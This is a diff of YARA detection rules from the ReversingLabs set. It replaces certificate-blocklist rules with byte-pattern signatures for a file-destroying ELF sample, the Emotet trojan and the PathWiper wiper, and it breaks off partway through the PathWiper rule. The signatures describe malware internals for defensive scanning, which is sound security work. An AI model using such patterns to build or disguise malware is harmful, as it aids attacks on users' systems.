+            ?? 7E ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 48 98 48 0F AF 45 ?? BA ?? ?? ?? ?? 48 F7 B5 ??
+            ?? ?? ?? 48 89 D0 48 89 C1 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8
+            ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 39
+            85 ?? ?? ?? ?? 73 ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ??
+            48 29 D0 48 89 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 00 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45
+            ?? 48 8B 45 ?? 89 C2 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 5D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+        }
+		$destroy_files_p3 = {
+            89 C7 48 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 C2 48
+            8B 45 ?? 48 01 D0 48 39 85 ?? ?? ?? ?? 73 ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 29
+            D0 48 8B 55 ?? 48 29 D0 48 89 45 ?? 48 83 7D ?? ?? 7E ?? 48 8B 4D ?? 48 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 48 98 48
+            39 85 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? EB ?? 90 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 83 FB ?? E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89
+            C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48
+            89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ??
+            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 8B 5D ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" and 1601424001 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $destroy_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07Bb6A9D1C642C5973C16D5353B17Ca4 : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Emotet trojan."
 		author = "ReversingLabs"
-		id = "094a02ee-394b-5989-9f73-6b942aca5500"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9742743d-753a-582b-9701-7278c8ed0e4e"
+		date = "2020-06-26"
+		modified = "2021-11-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5770-L5786"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.Emotet.yara#L1-L182"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b98dcd4f0ebe870a9dad55cac5b0db81be6062216337b75a74a0aff8436df57f"
+		logic_hash = "747d603c9849a66782c95050a4a634ffdb4ce2882adcfc5d63e1f1ea1651b25e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "Emotet"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$decrypt_resource_v1 = {
+            55 8B EC 83 EC ?? 53 8B D9 8B C2 56 57 89 45 ?? 8B 3B 33 F8 8B C7 89 7D ?? 83 E0 ??
+            75 ?? 8D 77 ?? EB ?? 8B F7 2B F0 83 C6 ?? 8D 0C 36 E8 ?? ?? ?? ?? 8B D0 89 55 ?? 85
+            D2 74 ?? 83 65 ?? ?? 8D 43 ?? 83 65 ?? ?? C1 EE ?? 8D 0C B0 8B F2 8B D9 2B D8 83 C3
+            ?? C1 EB ?? 3B C1 0F 47 5D ?? 85 DB 74 ?? 8B 55 ?? 8B F8 8B 0F 8D 7F ?? 33 CA 0F B6
+            C1 66 89 06 8B C1 C1 E8 ?? 8D 76 ?? 0F B6 C0 66 89 46 ?? C1 E9 ?? 0F B6 C1 66 89 46
+            ?? C1 E9 ?? 0F B6 C1 66 89 46 ?? 8B 45 ?? 40 89 45 ?? 3B C3 72 ?? 8B 7D ?? 8B 55 ??
+            33 C0 66 89 04 7A 5F 5E 8B C2 5B 8B E5 5D C3
+        }
+		$generate_filename_v1 = {
+            56 57 33 C0 BF ?? ?? ?? ?? 57 50 50 6A ?? 50 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 8B CE 5F 5E E9
+        }
+		$decrypt_resource_v2 = {
+            55 8B EC 83 EC ?? 8B 41 ?? 8B 11 33 C2 53 56 8D 71 ?? 89 55 ?? 8D 58 ?? 89 45 ?? 83
+            C6 ?? F6 C3 ?? 74 ?? 83 E3 ?? 83 C3 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
+            8B C8 E8 ?? ?? ?? ?? FF D0 8D 14 1B B9 ?? ?? ?? ?? 52 6A ?? 50 E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 89 45 ?? 85 C0 74 ?? C1 EB ?? 8B C8 57 33 C0 8D
+            14 9E 33 DB 8B FA 2B FE 83 C7 ?? C1 EF ?? 3B F2 0F 47 F8 85 FF 74 ?? 8B 16 8D 49 ??
+            33 55 ?? 8D 76 ?? 0F B6 C2 43 66 89 41 ?? 8B C2 C1 E8 ?? 0F B6 C0 66 89 41 ?? C1 EA
+            ?? 0F B6 C2 66 89 41 ?? C1 EA ?? 0F B6 C2 66 89 41 ?? 3B DF 72 ?? 8B 45 ?? 33 D2 8B
+            4D ?? 5F 66 89 14 41 8B C1 5E 5B 8B E5 5D C3
+        }
+		$generate_filename_v2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 51 6A ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 85 C0 0F 88 ?? ?? ?? ?? 56
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 8D [1-5] 51
+            51 50 56 8D [1-5] 68 ?? ?? ?? ?? 51 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            C8 E8 ?? ?? ?? ?? FF D0 83 C4 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8
+            E8 ?? ?? ?? ?? FF D0 56 6A ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8
+            E8 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 5E 8B E5 5D C3 33 C0 8B E5 5D C3
+        }
+		$decrypt_resource_v3 = {
+            56 8B F1 BA [6-9] B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 56 6A ?? 50 68 ?? ?? ?? ??
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 5E C3
+        }
+		$generate_filename_v3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F1 8B FA 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BB ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B D3 56 50 BE ?? ?? ?? ?? [2-5] 8B CE E8 ??
+            ?? ?? ?? 59 FF D0 57 8D 85 ?? ?? ?? ?? 8B D3 50 [2-5] 8B CE E8 ?? ?? ?? ?? 59 FF D0
+            8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 59 FF D0 F7 D8 5F 1B C0 5E 40 5B 8B E5 5D C3
+        }
+		$decrypt_resource_v4 = {
+            56 57 8B FA E8 ?? ?? ?? ?? 8B F0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 8B 0D ?? ?? ?? ??
+            89 44 B9 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
+            8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF D0 8B F8 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 57
+            FF D0 5F 5E C3
+        }
+		$generate_filename_snippet_v4 = {
+            A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 56 53 FF D0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 5F 5E 33 C9 8D
+            04 43 66 89 08 5D 5B 59 C3
+        }
+		$decrypt_resource_snippet_v5 = {
+            C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0
+            85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89 02 8B C1 C1 E8 ?? 8D 52
+            ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89 42 ?? 0F B6 C1 66 89 42
+            ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43 5F 5E 8B C3 5B 83 C4 ??
+            C3
+        }
+		$decrypt_resource_snippet_v6 = {
+            C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0
+            85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 88 0A 8B C1 C1 E8 ?? 8D 52 ?? C1 E9 ??
+            88 42 ?? 88 4A ?? C1 E9 ?? 45 88 4A ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 5D C6 04
+            03 ?? 5F 5E 8B C3 5B 83 C4 ?? C3
+        }
+		$liblzf_decompression_1 = {
+            83 EC ?? 8B 44 24 ?? 53 55 8D 2C 11 89 4C 24 ?? 8B 54 24 ?? 33 DB 03 C2 89 6C 24 ??
+            56 89 44 24 ?? 0F B6 41 ?? 8D 72 ?? 0F B6 11 C1 E2 ?? 0B D0 8D 45 ?? 89 44 24 ?? 57
+            8B F9 3B C8 0F 83 ?? ?? ?? ?? 0F B6 47 ?? C1 E2 ?? 0B D0 6B C2 ?? 8B CA C1 E9 ?? 33
+            CA 89 54 24 ?? 8B 54 24 ?? C1 E9 ?? 2B C8 8B 44 24 ?? 81 E1 ?? ?? ?? ?? 8B 2C 88 8B
+            C7 2B 44 24 ?? 03 6C 24 ?? 89 04 8A 8B C7 8B 54 24 ?? 2B C5 48 89 44 24 ?? 3D ?? ??
+            ?? ?? 0F 8D ?? ?? ?? ?? 3B EA 0F 86 ?? ?? ?? ?? 8A 45 ?? 3A 47 ?? 0F 85 ?? ?? ?? ??
+            0F B6 55 ?? 8D 4F ?? 0F B6 45 ?? 89 4C 24 ?? 0F B6 09 C1 E2 ?? 0B D0 C1 E1 ?? 0F B6
+            07 0B C8 3B D1 0F 85 ?? ?? ?? ?? 8B 44 24 ?? B9 ?? ?? ?? ?? 2B C7 3B C1 6A ?? 0F 47
+            C1 89 44 24 ?? 8D 46 ?? 5A 3B 44 24 ?? 72 ?? 33 C9 8B C6 85 DB 0F 94 C1 2B C1 83 C0
+            ?? 3B 44 24 ?? 0F 83 ?? ?? ?? ?? 8B C6 8D 4B ?? 2B C3 88 48 ?? 33 C0 85 DB 8B 5C 24
+            ?? 0F 94 C0 2B F0 83 FB ?? 0F 86 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ??
+            ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85
+            ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47
+        }
+		$liblzf_decompression_2 = {
+            0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A
+            47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45
+            ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47
+            ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ??
+            6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8D 0C 3A 2B EF 42 41 3B D3
+            73 ?? 8A 04 29 3A 01 74 ?? 8B 5C 24 ?? 83 EA ?? 83 FA ?? 73 ?? 8B CB 8A C2 C1 F9 ??
+            C0 E0 ?? 02 C8 88 0E 46 EB ?? 8B C3 C1 F8 ?? 2C ?? 88 06 8D 42 ?? 88 46 ?? 83 C6 ??
+            8B 7C 24 ?? 8B 44 24 ?? 47 88 1E 03 FA 33 DB 83 C6 ?? 3B F8 72 ?? 8B 6C 24 ?? 8D 46
+            ?? 3B 44 24 ?? 76 ?? 33 C0 EB ?? 3B 74 24 ?? 73 ?? 8A 07 43 88 06 46 8B 44 24 ?? 47
+            83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B F8 73 ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8A 07 43
+            88 06 46 47 83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B FD 72 ?? 8B CE 8D 53 ?? 2B CB 88
+            51 ?? 33 C9 85 DB 0F 94 C1 2B F1 2B 74 24 ?? 8B C6 5F 5E 5D 5B 83 C4 ?? C3
+        }
+		$decrypt_resource_snippet_v7 = {
+            C1 EE ?? 3B F9 0F 47 F0 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89
+            02 8B C1 C1 E8 ?? 8D 52 ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89
+            42 ?? 0F B6 C1 66 89 42 ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43
+            5F 5E 8B C3 5B 83 C4 ?? C3
+        }
+		$state_machine_snippet_v7 = {
+            8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B
+            94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 54 24 ??
+            8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 94
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 74 24
+            ?? 8B F0 FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? F7 DE 8B 94 24 ?? ?? ?? ?? 1B F6
+            81 E6 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ??
+            ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" and 1601856001 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $decrypt_resource_v1 and $generate_filename_v1 ) or ( $decrypt_resource_v2 and $generate_filename_v2 ) or ( $decrypt_resource_v3 and $generate_filename_v3 ) or ( $decrypt_resource_v4 and $generate_filename_snippet_v4 ) or ( $decrypt_resource_snippet_v5 and all of ( $liblzf_decompression_* ) ) or ( $decrypt_resource_snippet_v6 and all of ( $liblzf_decompression_* ) ) or ( $decrypt_resource_snippet_v7 and $state_machine_snippet_v7 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0A1Dc99E4D5264C45A5090F93242A30A : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Pathwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PathWiper trojan."
 		author = "ReversingLabs"
-		id = "9b85ed8d-ddda-51d0-bfac-5cdc6e4fd94f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8d6b0443-405c-55c1-8f19-0a60cc3f6f43"
+		date = "2025-08-26"
+		modified = "2025-08-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5788-L5804"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.PathWiper.yara#L1-L280"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1985c9c4f4a93c3088eaec3031df93cf87a9d7ee36b94322330caf3c21982f3c"
+		logic_hash = "d439cb7c369405f3938d856e1ad92b47889d0f0cad45f718a8d0c86dd7f5a461"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "PathWiper"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" and 1600905601 <= pe.signatures [ i ] . not_after )
-}
+	strings:
+		$find_volumes_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 7D ?? 33 F6 89 BD ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 89 75 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 37
+            89 77 ?? 89 77 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B
+            CA 49 80 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 80 BD ?? ?? ?? ?? ?? 0F
+            85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 80 BC 0D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 83 ?? ?? ??
+            ?? C6 84 0D ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B
+            CA 8D 85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 B5 ?? ??
+            ?? ?? 74 ?? 0F 10 85 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? C7 46 ?? ?? ??
+            ?? ?? 0F 11 06 C6 85 ?? ?? ?? ?? ?? F3 0F 7E 85 ?? ?? ?? ?? 66 0F D6 46 ?? 83 C6
+        }
+		$find_volumes_p2 = {
+            89 B5 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 50
+            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01
+            41 84 C0 75 ?? 2B CA 49 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 07 8B 85 ?? ?? ?? ?? 89 77 ?? 89 47 ?? 8D 8D ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 89 B5 ?? ?? ?? ??
+            50 8D 8D ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 83 FA ?? 8B 8D ?? ?? ?? ?? 0F 43 C7 C6 45 ?? ?? 80 7C 01 ?? ?? 75 ??
+            49 8D 85 ?? ?? ?? ?? 83 FA ?? 89 8D ?? ?? ?? ?? 0F 43 C7 C6 04 08 ?? 6A ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 89 08 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 C9
+            0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 33 C0 03 D1 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 09
+            85 C9 74 ?? 8B 01 4A 85 C0 74 ?? 8B 00 85 C0 74 ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33
+            C0 8B 48 ?? 8B 40 ?? 49 23 CA C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 04 88 89
+            85 ?? ?? ?? ?? 83 78 ?? ?? 8B 78 ?? 89 BD ?? ?? ?? ?? 72 ?? 8B 00 89 85 ?? ?? ?? ??
+            83 FF ?? 73 ?? 0F 10 00 89 7D ?? C7 45 ?? ?? ?? ?? ?? 0F 11 45 ?? 8B 7D ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C7 B9 ?? ?? ?? ?? 83 C8 ?? 3D ?? ?? ?? ?? 0F
+            47 C1 89 85 ?? ?? ?? ?? 8D 48 ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 3B C1 B9 ?? ?? ??
+            ?? 0F 46 C1 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 78 ?? 83 E7 ?? 89
+        }
+		$find_files_p2 = {
+            47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 85 ?? ?? ??
+            ?? 40 89 7D ?? 50 FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 4D ?? 83 C0 ?? C6 45 ?? ?? 83 CE ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ??
